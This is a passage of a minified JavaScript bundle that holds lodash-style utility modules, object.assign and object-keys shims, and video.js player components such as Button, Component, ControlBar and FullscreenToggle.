0:d(b)[a]}}var d=a("./toObject");b.exports=c},{"./toObject":28}],14:[function(a,b){function c(a){return"string"==typeof a?a:null==a?"":a+""}b.exports=c},{}],15:[function(a,b){function c(a,b,c){if("function"!=typeof a)return d;if(void 0===b)return a;switch(c){case 1:return function(c){return a.call(b,c)};case 3:return function(c,d,e){return a.call(b,c,d,e)};case 4:return function(c,d,e,f){return a.call(b,c,d,e,f)};case 5:return function(c,d,e,f,g){return a.call(b,c,d,e,f,g)}}return function(){return a.apply(b,arguments)}}var d=a("../utility/identity");b.exports=c},{"../utility/identity":43}],16:[function(a,b){function c(a){return f(function(b,c){var f=-1,g=null==b?0:c.length,h=g>2?c[g-2]:void 0,i=g>2?c[2]:void 0,j=g>1?c[g-1]:void 0;for("function"==typeof h?(h=d(h,j,5),g-=2):(h="function"==typeof j?j:void 0,g-=h?1:0),i&&e(c[0],c[1],i)&&(h=3>g?void 0:h,g=1);++f<g;){var k=c[f];k&&a(b,k,h)}return b})}var d=a("./bindCallback"),e=a("./isIterateeCall"),f=a("../function/restParam");b.exports=c},{"../function/restParam":4,"./bindCallback":15,"./isIterateeCall":23}],17:[function(a,b){function c(a){return function(b,c,e){for(var f=d(b),g=e(b),h=g.length,i=a?h:-1;a?i--:++i<h;){var j=g[i];if(c(f[j],j,f)===!1)break}return b}}var d=a("./toObject");b.exports=c},{"./toObject":28}],18:[function(a,b){var c=a("./baseProperty"),d=c("length");b.exports=d},{"./baseProperty":13}],19:[function(a,b){function c(a,b){var c=null==a?void 0:a[b];return d(c)?c:void 0}var d=a("../lang/isNative");b.exports=c},{"../lang/isNative":32}],20:[function(a,b){function c(a){return null!=a&&e(d(a))}var d=a("./getLength"),e=a("./isLength");b.exports=c},{"./getLength":18,"./isLength":24}],21:[function(a,b){var c=function(){try{Object({toString:0}+"")}catch(a){return function(){return!1}}return function(a){return"function"!=typeof a.toString&&"string"==typeof(a+"")}}();b.exports=c},{}],22:[function(a,b){function c(a,b){return a="number"==typeof a||d.test(a)?+a:-1,b=null==b?e:b,a>-1&&a%1==0&&b>a}var d=/^\d+$/,e=9007199254740991;b.exports=c},{}],23:[function(a,b){function c(a,b,c){if(!f(c))return!1;var g=typeof b;if("number"==g?d(c)&&e(b,c.length):"string"==g&&b in c){var h=c[b];return a===a?a===h:h!==h}return!1}var d=a("./isArrayLike"),e=a("./isIndex"),f=a("../lang/isObject");b.exports=c},{"../lang/isObject":33,"./isArrayLike":20,"./isIndex":22}],24:[function(a,b){function c(a){return"number"==typeof a&&a>-1&&a%1==0&&d>=a}var d=9007199254740991;b.exports=c},{}],25:[function(a,b){function c(a){return!!a&&"object"==typeof a}b.exports=c},{}],26:[function(a,b){function c(a){var b;if(!g(a)||l.call(a)!=i||f(a)||!k.call(a,"constructor")&&(b=a.constructor,"function"==typeof b&&!(b instanceof b))||!h.argsTag&&e(a))return!1;var c;return h.ownLast?(d(a,function(a,b,d){return c=k.call(d,b),!1}),c!==!1):(d(a,function(a,b){c=b}),void 0===c||k.call(a,c))}var d=a("./baseForIn"),e=a("../lang/isArguments"),f=a("./isHostObject"),g=a("./isObjectLike"),h=a("../support"),i="[object Object]",j=Object.prototype,k=j.hasOwnProperty,l=j.toString;b.exports=c},{"../lang/isArguments":29,"../support":42,"./baseForIn":9,"./isHostObject":21,"./isObjectLike":25}],27:[function(a,b){function c(a){for(var b=i(a),c=b.length,j=c&&a.length,l=!!j&&g(j)&&(e(a)||d(a)||h(a)),m=-1,n=[];++m<c;){var o=b[m];(l&&f(o,j)||k.call(a,o))&&n.push(o)}return n}var d=a("../lang/isArguments"),e=a("../lang/isArray"),f=a("./isIndex"),g=a("./isLength"),h=a("../lang/isString"),i=a("../object/keysIn"),j=Object.prototype,k=j.hasOwnProperty;b.exports=c},{"../lang/isArguments":29,"../lang/isArray":30,"../lang/isString":35,"../object/keysIn":39,"./isIndex":22,"./isLength":24}],28:[function(a,b){function c(a){if(f.unindexedChars&&e(a)){for(var b=-1,c=a.length,g=Object(a);++b<c;)g[b]=a.charAt(b);return g}return d(a)?a:Object(a)}var d=a("../lang/isObject"),e=a("../lang/isString"),f=a("../support");b.exports=c},{"../lang/isObject":33,"../lang/isString":35,"../support":42}],29:[function(a,b){function c(a){return e(a)&&d(a)&&j.call(a)==g}var d=a("../internal/isArrayLike"),e=a("../internal/isObjectLike"),f=a("../support"),g="[object Arguments]",h=Object.prototype,i=h.hasOwnProperty,j=h.toString,k=h.propertyIsEnumerable;f.argsTag||(c=function(a){return e(a)&&d(a)&&i.call(a,"callee")&&!k.call(a,"callee")}),b.exports=c},{"../internal/isArrayLike":20,"../internal/isObjectLike":25,"../support":42}],30:[function(a,b){var c=a("../internal/getNative"),d=a("../internal/isLength"),e=a("../internal/isObjectLike"),f="[object Array]",g=Object.prototype,h=g.toString,i=c(Array,"isArray"),j=i||function(a){return e(a)&&d(a.length)&&h.call(a)==f};b.exports=j},{"../internal/getNative":19,"../internal/isLength":24,"../internal/isObjectLike":25}],31:[function(a,b){(function(c){var d=a("../internal/baseIsFunction"),e=a("../internal/getNative"),f="[object Function]",g=Object.prototype,h=g.toString,i=e(c,"Uint8Array"),j=d(/x/)||i&&!d(i)?function(a){return h.call(a)==f}:d;b.exports=j}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{"../internal/baseIsFunction":10,"../internal/getNative":19}],32:[function(a,b){function c(a){return null==a?!1:l.call(a)==g?m.test(j.call(a)):f(a)&&(e(a)?m:h).test(a)}var d=a("../string/escapeRegExp"),e=a("../internal/isHostObject"),f=a("../internal/isObjectLike"),g="[object Function]",h=/^\[object .+?Constructor\]$/,i=Object.prototype,j=Function.prototype.toString,k=i.hasOwnProperty,l=i.toString,m=RegExp("^"+d(j.call(k)).replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g,"$1.*?")+"$");b.exports=c},{"../internal/isHostObject":21,"../internal/isObjectLike":25,"../string/escapeRegExp":41}],33:[function(a,b){function c(a){var b=typeof a;return!!a&&("object"==b||"function"==b)}b.exports=c},{}],34:[function(a,b){var c=a("../internal/getNative"),d=a("./isArguments"),e=a("../internal/shimIsPlainObject"),f=a("../support"),g="[object Object]",h=Object.prototype,i=h.toString,j=c(Object,"getPrototypeOf"),k=j?function(a){if(!a||i.call(a)!=g||!f.argsTag&&d(a))return!1;var b=c(a,"valueOf"),h=b&&(h=j(b))&&j(h);return h?a==h||j(a)==h:e(a)}:e;b.exports=k},{"../internal/getNative":19,"../internal/shimIsPlainObject":26,"../support":42,"./isArguments":29}],35:[function(a,b){function c(a){return"string"==typeof a||d(a)&&g.call(a)==e}var d=a("../internal/isObjectLike"),e="[object String]",f=Object.prototype,g=f.toString;b.exports=c},{"../internal/isObjectLike":25}],36:[function(a,b){function c(a){return e(a)&&d(a.length)&&!!C[E.call(a)]}var d=a("../internal/isLength"),e=a("../internal/isObjectLike"),f="[object Arguments]",g="[object Array]",h="[object Boolean]",i="[object Date]",j="[object Error]",k="[object Function]",l="[object Map]",m="[object Number]",n="[object Object]",o="[object RegExp]",p="[object Set]",q="[object String]",r="[object WeakMap]",s="[object ArrayBuffer]",t="[object Float32Array]",u="[object Float64Array]",v="[object Int8Array]",w="[object Int16Array]",x="[object Int32Array]",y="[object Uint8Array]",z="[object Uint8ClampedArray]",A="[object Uint16Array]",B="[object Uint32Array]",C={};C[t]=C[u]=C[v]=C[w]=C[x]=C[y]=C[z]=C[A]=C[B]=!0,C[f]=C[g]=C[s]=C[h]=C[i]=C[j]=C[k]=C[l]=C[m]=C[n]=C[o]=C[p]=C[q]=C[r]=!1;var D=Object.prototype,E=D.toString;b.exports=c},{"../internal/isLength":24,"../internal/isObjectLike":25}],37:[function(a,b){function c(a){return d(a,e(a))}var d=a("../internal/baseCopy"),e=a("../object/keysIn");b.exports=c},{"../internal/baseCopy":7,"../object/keysIn":39}],38:[function(a,b){var c=a("../internal/getNative"),d=a("../internal/isArrayLike"),e=a("../lang/isObject"),f=a("../internal/shimKeys"),g=a("../support"),h=c(Object,"keys"),i=h?function(a){var b=null==a?null:a.constructor;return"function"==typeof b&&b.prototype===a||("function"==typeof a?g.enumPrototypes:d(a))?f(a):e(a)?h(a):[]}:f;b.exports=i},{"../internal/getNative":19,"../internal/isArrayLike":20,"../internal/shimKeys":27,"../lang/isObject":33,"../support":42}],39:[function(a,b){function c(a){if(null==a)return[];j(a)||(a=Object(a));var b=a.length;b=b&&i(b)&&(f(a)||e(a)||k(a))&&b||0;for(var c=a.constructor,d=-1,m=g(c)&&c.prototype||x,n=m===a,o=Array(b),q=b>0,r=l.enumErrorProps&&(a===w||a instanceof Error),t=l.enumPrototypes&&g(a);++d<b;)o[d]=d+"";for(var C in a)t&&"prototype"==C||r&&("message"==C||"name"==C)||q&&h(C,b)||"constructor"==C&&(n||!z.call(a,C))||o.push(C);if(l.nonEnumShadows&&a!==x){var D=a===y?u:a===w?p:A.call(a),E=B[D]||B[s];for(D==s&&(m=x),b=v.length;b--;){C=v[b];var F=E[C];n&&F||(F?!z.call(a,C):a[C]===m[C])||o.push(C)}}return o}var d=a("../internal/arrayEach"),e=a("../lang/isArguments"),f=a("../lang/isArray"),g=a("../lang/isFunction"),h=a("../internal/isIndex"),i=a("../internal/isLength"),j=a("../lang/isObject"),k=a("../lang/isString"),l=a("../support"),m="[object Array]",n="[object Boolean]",o="[object Date]",p="[object Error]",q="[object Function]",r="[object Number]",s="[object Object]",t="[object RegExp]",u="[object String]",v=["constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","valueOf"],w=Error.prototype,x=Object.prototype,y=String.prototype,z=x.hasOwnProperty,A=x.toString,B={};B[m]=B[o]=B[r]={constructor:!0,toLocaleString:!0,toString:!0,valueOf:!0},B[n]=B[u]={constructor:!0,toString:!0,valueOf:!0},B[p]=B[q]=B[t]={constructor:!0,toString:!0},B[s]={constructor:!0},d(v,function(a){for(var b in B)if(z.call(B,b)){var c=B[b];c[a]=z.call(c,a)}}),b.exports=c},{"../internal/arrayEach":6,"../internal/isIndex":22,"../internal/isLength":24,"../lang/isArguments":29,"../lang/isArray":30,"../lang/isFunction":31,"../lang/isObject":33,"../lang/isString":35,"../support":42}],40:[function(a,b){var c=a("../internal/baseMerge"),d=a("../internal/createAssigner"),e=d(c);b.exports=e},{"../internal/baseMerge":11,"../internal/createAssigner":16}],41:[function(a,b){function c(a){return a=d(a),a&&f.test(a)?a.replace(e,"\\$&"):a}var d=a("../internal/baseToString"),e=/[.*+?^${}()|[\]\/\\]/g,f=RegExp(e.source);b.exports=c},{"../internal/baseToString":14}],42:[function(a,b){(function(a){var c="[object Arguments]",d="[object Object]",e=Array.prototype,f=Error.prototype,g=Object.prototype,h=(h=a.window)?h.document:null,i=g.toString,j=g.propertyIsEnumerable,k=e.splice,l={};!function(a){var b=function(){this.x=a},e={0:a,length:a},g=[];b.prototype={valueOf:a,y:a};for(var m in new b)g.push(m);l.argsTag=i.call(arguments)==c,l.enumErrorProps=j.call(f,"message")||j.call(f,"name"),l.enumPrototypes=j.call(b,"prototype"),l.nodeTag=i.call(h)!=d,l.nonEnumShadows=!/valueOf/.test(g),l.ownLast="x"!=g[0],l.spliceObjects=(k.call(e,0,1),!e[0]),l.unindexedChars="x"[0]+Object("x")[0]!="xx";try{l.dom=11===h.createDocumentFragment().nodeType}catch(n){l.dom=!1}}(1,0),b.exports=l}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{}],43:[function(a,b){function c(a){return a}b.exports=c},{}],44:[function(a,b){"use strict";var c=a("object-keys"),d=function(a){return"undefined"!=typeof a&&null!==a},e="function"==typeof Symbol&&"symbol"==typeof Symbol(),f=a("define-properties"),g=Object.prototype.propertyIsEnumerable,h=function(a){return function(b){return g.call(a,b)}},i=function(a){if(!d(a))throw new TypeError("target must be an object");var b,f,g,i,j=Object(a);for(b=1;b<arguments.length;++b)for(f=Object(arguments[b]),i=c(f),e&&Object.getOwnPropertySymbols&&i.push.apply(i,Object.getOwnPropertySymbols(f).filter(h(f))),g=0;g<i.length;++g)j[i[g]]=f[i[g]];return j};i.shim=function(){if(Object.assign&&Object.preventExtensions){var a=function(){var a=Object.preventExtensions({1:2});try{Object.assign(a,"xy")}catch(b){return"y"===a[1]}}();a&&delete Object.assign}return Object.assign||f(Object,{assign:i}),Object.assign||i},b.exports=i},{"define-properties":45,"object-keys":47}],45:[function(a,b){"use strict";var c=a("object-keys"),d=a("foreach"),e=Object.prototype.toString,f=function(a){return"function"==typeof a&&"[object Function]"===e.call(a)},g=function(){var a={};try{return Object.defineProperty(a,"x",{value:a}),a.x===a}catch(b){return!1}},h=Object.defineProperty&&g(),i=function(a,b,c,d){(!(b in a)||f(d)&&d())&&(h?Object.defineProperty(a,b,{configurable:!0,enumerable:!1,writable:!0,value:c}):a[b]=c)},j=function(a,b){var e=arguments.length>2?arguments[2]:{};d(c(b),function(c){i(a,c,b[c],e[c])})};j.supportsDescriptors=!!h,b.exports=j},{foreach:46,"object-keys":47}],46:[function(a,b){var c=Object.prototype.hasOwnProperty,d=Object.prototype.toString;b.exports=function(a,b,e){if("[object Function]"!==d.call(b))throw new TypeError("iterator must be a function");var f=a.length;if(f===+f)for(var g=0;f>g;g++)b.call(e,a[g],g,a);else for(var h in a)c.call(a,h)&&b.call(e,a[h],h,a)}},{}],47:[function(a,b){"use strict";var c=Object.prototype.hasOwnProperty,d=Object.prototype.toString,e=a("./isArguments"),f=!{toString:null}.propertyIsEnumerable("toString"),g=function(){}.propertyIsEnumerable("prototype"),h=["toString","toLocaleString","valueOf","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","constructor"],i=function(a){var b=null!==a&&"object"==typeof a,i="[object Function]"===d.call(a),j=e(a),k=b&&"[object String]"===d.call(a),l=[];if(!b&&!i&&!j)throw new TypeError("Object.keys called on a non-object");var m=g&&i;if(k&&a.length>0&&!c.call(a,0))for(var n=0;n<a.length;++n)l.push(String(n));if(j&&a.length>0)for(var o=0;o<a.length;++o)l.push(String(o));else for(var p in a)m&&"prototype"===p||!c.call(a,p)||l.push(String(p));if(f)for(var q=a.constructor,r=q&&q.prototype===a,s=0;s<h.length;++s)r&&"constructor"===h[s]||!c.call(a,h[s])||l.push(h[s]);return l};i.shim=function(){return Object.keys||(Object.keys=i),Object.keys||i},b.exports=i},{"./isArguments":48}],48:[function(a,b){"use strict";var c=Object.prototype.toString;b.exports=function(a){var b=c.call(a),d="[object Arguments]"===b;return d||(d="[object Array]"!==b&&null!==a&&"object"==typeof a&&"number"==typeof a.length&&a.length>=0&&"[object Function]"===c.call(a.callee)),d}},{}],49:[function(a,b){function c(a,b){var c,d=null;try{c=JSON.parse(a,b)}catch(e){d=e}return[d,c]}b.exports=c},{}],50:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./button.js"),h=d(g),i=a("./component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-big-play-button"},b.prototype.handleClick=function(){this.player_.play()},b}(h["default"]);k.prototype.controlText_="Play Video",j["default"].registerComponent("BigPlayButton",k),c["default"]=k,b.exports=c["default"]},{"./button.js":51,"./component.js":52}],51:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component"),h=d(g),i=a("./utils/dom.js"),j=d(i),k=a("./utils/events.js"),l=d(k),m=a("./utils/fn.js"),n=d(m),o=a("global/document"),p=d(o),q=a("object.assign"),r=d(q),s=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.emitTapEvents(),this.on("tap",this.handleClick),this.on("click",this.handleClick),this.on("focus",this.handleFocus),this.on("blur",this.handleBlur)}return f(b,a),b.prototype.createEl=function(){var b=void 0===arguments[0]?"button":arguments[0],c=void 0===arguments[1]?{}:arguments[1];c=r["default"]({className:this.buildCSSClass(),role:"button","aria-live":"polite",tabIndex:0},c);var d=a.prototype.createEl.call(this,b,c);return this.controlTextEl_=j.createEl("span",{className:"vjs-control-text"}),d.appendChild(this.controlTextEl_),this.controlText(this.controlText_),d},b.prototype.controlText=function(a){return a?(this.controlText_=a,this.controlTextEl_.innerHTML=this.localize(this.controlText_),this):this.controlText_||"Need Text"},b.prototype.buildCSSClass=function(){return"vjs-control vjs-button "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){},b.prototype.handleFocus=function(){l.on(p["default"],"keydown",n.bind(this,this.handleKeyPress))},b.prototype.handleKeyPress=function(a){(32===a.which||13===a.which)&&(a.preventDefault(),this.handleClick())},b.prototype.handleBlur=function(){l.off(p["default"],"keydown",n.bind(this,this.handleKeyPress))},b}(h["default"]);h["default"].registerComponent("Button",s),c["default"]=s,b.exports=c["default"]},{"./component":52,"./utils/dom.js":111,"./utils/events.js":112,"./utils/fn.js":113,"global/document":1,"object.assign":44}],52:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")};c.__esModule=!0;var f=a("global/window"),g=d(f),h=a("./utils/dom.js"),i=d(h),j=a("./utils/fn.js"),k=d(j),l=a("./utils/guid.js"),m=d(l),n=a("./utils/events.js"),o=d(n),p=a("./utils/log.js"),q=d(p),r=a("./utils/to-title-case.js"),s=d(r),t=a("object.assign"),u=d(t),v=a("./utils/merge-options.js"),w=d(v),x=function(){function a(b,c,d){if(e(this,a),this.player_=!b&&this.play?b=this:b,this.options_=w["default"]({},this.options_),c=this.options_=w["default"](this.options_,c),this.id_=c.id||c.el&&c.el.id,!this.id_){var f=b&&b.id&&b.id()||"no_player";this.id_=""+f+"_component_"+m.newGUID()}this.name_=c.name||null,c.el?this.el_=c.el:c.createEl!==!1&&(this.el_=this.createEl()),this.children_=[],this.childIndex_={},this.childNameIndex_={},c.initChildren!==!1&&this.initChildren(),this.ready(d),c.reportTouchActivity!==!1&&this.enableTouchActivity()}return a.prototype.init=function(){a.apply(this,arguments)},a.prototype.dispose=function(){if(this.trigger({type:"dispose",bubbles:!1}),this.children_)for(var a=this.children_.length-1;a>=0;a--)this.children_[a].dispose&&this.children_[a].dispose();this.children_=null,this.childIndex_=null,this.childNameIndex_=null,this.off(),this.el_.parentNode&&this.el_.parentNode.removeChild(this.el_),i.removeElData(this.el_),this.el_=null},a.prototype.player=function(){return this.player_},a.prototype.options=function(a){return q["default"].warn("this.options() has been deprecated and will be moved to the constructor in 6.0"),a?(this.options_=w["default"](this.options_,a),this.options_):this.options_},a.prototype.el=function(){return this.el_},a.prototype.createEl=function(a,b){return i.createEl(a,b)},a.prototype.localize=function(a){var b=this.player_.language&&this.player_.language(),c=this.player_.languages&&this.player_.languages();if(!b||!c)return a;var d=c[b];if(d&&d[a])return d[a];var e=b.split("-")[0],f=c[e];return f&&f[a]?f[a]:a},a.prototype.contentEl=function(){return this.contentEl_||this.el_},a.prototype.id=function(){return this.id_},a.prototype.name=function(){return this.name_},a.prototype.children=function(){return this.children_},a.prototype.getChildById=function(a){return this.childIndex_[a]},a.prototype.getChild=function(a){return this.childNameIndex_[a]},a.prototype.addChild=function(b){var c=void 0===arguments[1]?{}:arguments[1],d=void 0,e=void 0;if("string"==typeof b){e=b,c||(c={}),c===!0&&(q["default"].warn("Initializing a child component with `true` is deprecated. Children should be defined in an array when possible, but if necessary use an object instead of `true`."),c={});var f=c.componentClass||s["default"](e);c.name=e;var g=a.getComponent(f);d=new g(this.player_||this,c)}else d=b;return this.children_.push(d),"function"==typeof d.id&&(this.childIndex_[d.id()]=d),e=e||d.name&&d.name(),e&&(this.childNameIndex_[e]=d),"function"==typeof d.el&&d.el()&&this.contentEl().appendChild(d.el()),d},a.prototype.removeChild=function(a){if("string"==typeof a&&(a=this.getChild(a)),a&&this.children_){for(var b=!1,c=this.children_.length-1;c>=0;c--)if(this.children_[c]===a){b=!0,this.children_.splice(c,1);break}if(b){this.childIndex_[a.id()]=null,this.childNameIndex_[a.name()]=null;var d=a.el();d&&d.parentNode===this.contentEl()&&this.contentEl().removeChild(a.el())}}},a.prototype.initChildren=function(){var a=this,b=this.options_.children;b&&!function(){var c=a.options_,d=function(b,d){void 0!==c[b]&&(d=c[b]),d!==!1&&(d.playerOptions=a.options_.playerOptions,a[b]=a.addChild(b,d))};if(Array.isArray(b))for(var e=0;e<b.length;e++){var f=b[e],g=void 0,h=void 0;"string"==typeof f?(g=f,h={}):(g=f.name,h=f),d(g,h)}else Object.getOwnPropertyNames(b).forEach(function(a){d(a,b[a])})}()},a.prototype.buildCSSClass=function(){return""},a.prototype.on=function(a,b,c){var d=this;return"string"==typeof a||Array.isArray(a)?o.on(this.el_,a,k.bind(this,b)):!function(){var e=a,f=b,g=k.bind(d,c),h=function(){return d.off(e,f,g)};h.guid=g.guid,d.on("dispose",h);var i=function(){return d.off("dispose",h)};i.guid=g.guid,a.nodeName?(o.on(e,f,g),o.on(e,"dispose",i)):"function"==typeof a.on&&(e.on(f,g),e.on("dispose",i))}(),this},a.prototype.off=function(a,b,c){if(!a||"string"==typeof a||Array.isArray(a))o.off(this.el_,a,b);else{var d=a,e=b,f=k.bind(this,c);this.off("dispose",f),a.nodeName?(o.off(d,e,f),o.off(d,"dispose",f)):(d.off(e,f),d.off("dispose",f))}return this},a.prototype.one=function(a,b,c){var d=this,e=arguments;return"string"==typeof a||Array.isArray(a)?o.one(this.el_,a,k.bind(this,b)):!function(){var f=a,g=b,h=k.bind(d,c),i=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){d.off(f,g,i),h.apply(null,e)});i.guid=h.guid,d.on(f,g,i)}(),this},a.prototype.trigger=function(a,b){return o.trigger(this.el_,a,b),this},a.prototype.ready=function(a){return a&&(this.isReady_?this.setTimeout(a,1):(this.readyQueue_=this.readyQueue_||[],this.readyQueue_.push(a))),this},a.prototype.triggerReady=function(){this.isReady_=!0,this.setTimeout(function(){var a=this.readyQueue_;a&&a.length>0&&(a.forEach(function(a){a.call(this)},this),this.readyQueue_=[]),this.trigger("ready")},1)},a.prototype.hasClass=function(a){return i.hasElClass(this.el_,a)},a.prototype.addClass=function(a){return i.addElClass(this.el_,a),this},a.prototype.removeClass=function(a){return i.removeElClass(this.el_,a),this},a.prototype.show=function(){return this.removeClass("vjs-hidden"),this},a.prototype.hide=function(){return this.addClass("vjs-hidden"),this},a.prototype.lockShowing=function(){return this.addClass("vjs-lock-showing"),this},a.prototype.unlockShowing=function(){return this.removeClass("vjs-lock-showing"),this},a.prototype.width=function(a,b){return this.dimension("width",a,b)},a.prototype.height=function(a,b){return this.dimension("height",a,b)},a.prototype.dimensions=function(a,b){return this.width(a,!0).height(b)},a.prototype.dimension=function(a,b,c){if(void 0!==b)return(null===b||b!==b)&&(b=0),this.el_.style[a]=-1!==(""+b).indexOf("%")||-1!==(""+b).indexOf("px")?b:"auto"===b?"":b+"px",c||this.trigger("resize"),this;if(!this.el_)return 0;var d=this.el_.style[a],e=d.indexOf("px");return-1!==e?parseInt(d.slice(0,e),10):parseInt(this.el_["offset"+s["default"](a)],10)},a.prototype.emitTapEvents=function(){var a=0,b=null,c=10,d=200,e=void 0;this.on("touchstart",function(c){1===c.touches.length&&(b=u["default"]({},c.touches[0]),a=(new Date).getTime(),e=!0)}),this.on("touchmove",function(a){if(a.touches.length>1)e=!1;else if(b){var d=a.touches[0].pageX-b.pageX,f=a.touches[0].pageY-b.pageY,g=Math.sqrt(d*d+f*f);g>c&&(e=!1)}});var f=function(){e=!1};this.on("touchleave",f),this.on("touchcancel",f),this.on("touchend",function(c){if(b=null,e===!0){var f=(new Date).getTime()-a;d>f&&(c.preventDefault(),this.trigger("tap"))}})},a.prototype.enableTouchActivity=function(){if(this.player()&&this.player().reportUserActivity){var a=k.bind(this.player(),this.player().reportUserActivity),b=void 0;this.on("touchstart",function(){a(),this.clearInterval(b),b=this.setInterval(a,250)});var c=function(){a(),this.clearInterval(b)};this.on("touchmove",a),this.on("touchend",c),this.on("touchcancel",c)}},a.prototype.setTimeout=function(a,b){a=k.bind(this,a);var c=g["default"].setTimeout(a,b),d=function(){this.clearTimeout(c)};return d.guid="vjs-timeout-"+c,this.on("dispose",d),c},a.prototype.clearTimeout=function(a){g["default"].clearTimeout(a);var b=function(){};return b.guid="vjs-timeout-"+a,this.off("dispose",b),a},a.prototype.setInterval=function(a,b){a=k.bind(this,a);var c=g["default"].setInterval(a,b),d=function(){this.clearInterval(c)};return d.guid="vjs-interval-"+c,this.on("dispose",d),c},a.prototype.clearInterval=function(a){g["default"].clearInterval(a);var b=function(){};return b.guid="vjs-interval-"+a,this.off("dispose",b),a},a.registerComponent=function(b,c){return a.components_||(a.components_={}),a.components_[b]=c,c},a.getComponent=function(b){return a.components_&&a.components_[b]?a.components_[b]:g["default"]&&g["default"].videojs&&g["default"].videojs[b]?(q["default"].warn("The "+b+" component was added to the videojs object when it should be registered using videojs.registerComponent(name, component)"),g["default"].videojs[b]):void 0},a.extend=function(b){b=b||{},q["default"].warn("Component.extend({}) has been deprecated, use videojs.extends(Component, {}) instead");var c=b.init||b.init||this.prototype.init||this.prototype.init||function(){},d=function(){c.apply(this,arguments)};d.prototype=Object.create(this.prototype),d.prototype.constructor=d,d.extend=a.extend;for(var e in b)b.hasOwnProperty(e)&&(d.prototype[e]=b[e]);return d},a}();x.registerComponent("Component",x),c["default"]=x,b.exports=c["default"]},{"./utils/dom.js":111,"./utils/events.js":112,"./utils/fn.js":113,"./utils/guid.js":115,"./utils/log.js":116,"./utils/merge-options.js":117,"./utils/to-title-case.js":120,"global/window":2,"object.assign":44}],53:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component.js"),h=d(g),i=a("./play-toggle.js"),j=(d(i),a("./time-controls/current-time-display.js")),k=(d(j),a("./time-controls/duration-display.js")),l=(d(k),a("./time-controls/time-divider.js")),m=(d(l),a("./time-controls/remaining-time-display.js")),n=(d(m),a("./live-display.js")),o=(d(n),a("./progress-control/progress-control.js")),p=(d(o),a("./fullscreen-toggle.js")),q=(d(p),a("./volume-control/volume-control.js")),r=(d(q),a("./volume-menu-button.js")),s=(d(r),a("./mute-toggle.js")),t=(d(s),a("./text-track-controls/chapters-button.js")),u=(d(t),a("./text-track-controls/subtitles-button.js")),v=(d(u),a("./text-track-controls/captions-button.js")),w=(d(v),a("./playback-rate-menu/playback-rate-menu-button.js")),x=(d(w),a("./spacer-controls/custom-control-spacer.js")),y=(d(x),function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-control-bar"})},b}(h["default"]));y.prototype.options_={loadEvent:"play",children:["playToggle","volumeMenuButton","currentTimeDisplay","timeDivider","durationDisplay","progressControl","liveDisplay","remainingTimeDisplay","customControlSpacer","playbackRateMenuButton","muteToggle","volumeControl","chaptersButton","subtitlesButton","captionsButton","fullscreenToggle"]},h["default"].registerComponent("ControlBar",y),
c["default"]=y,b.exports=c["default"]},{"../component.js":52,"./fullscreen-toggle.js":54,"./live-display.js":55,"./mute-toggle.js":56,"./play-toggle.js":57,"./playback-rate-menu/playback-rate-menu-button.js":58,"./progress-control/progress-control.js":62,"./spacer-controls/custom-control-spacer.js":64,"./text-track-controls/captions-button.js":67,"./text-track-controls/chapters-button.js":68,"./text-track-controls/subtitles-button.js":71,"./time-controls/current-time-display.js":74,"./time-controls/duration-display.js":75,"./time-controls/remaining-time-display.js":76,"./time-controls/time-divider.js":77,"./volume-control/volume-control.js":79,"./volume-menu-button.js":81}],54:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-fullscreen-control "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){this.player_.isFullscreen()?(this.player_.exitFullscreen(),this.controlText("Fullscreen")):(this.player_.requestFullscreen(),this.controlText("Non-Fullscreen"))},b}(h["default"]);k.prototype.controlText_="Fullscreen",j["default"].registerComponent("FullscreenToggle",k),c["default"]=k,b.exports=c["default"]},{"../button.js":51,"../component.js":52}],55:[function(a,b,c){"use strict";var 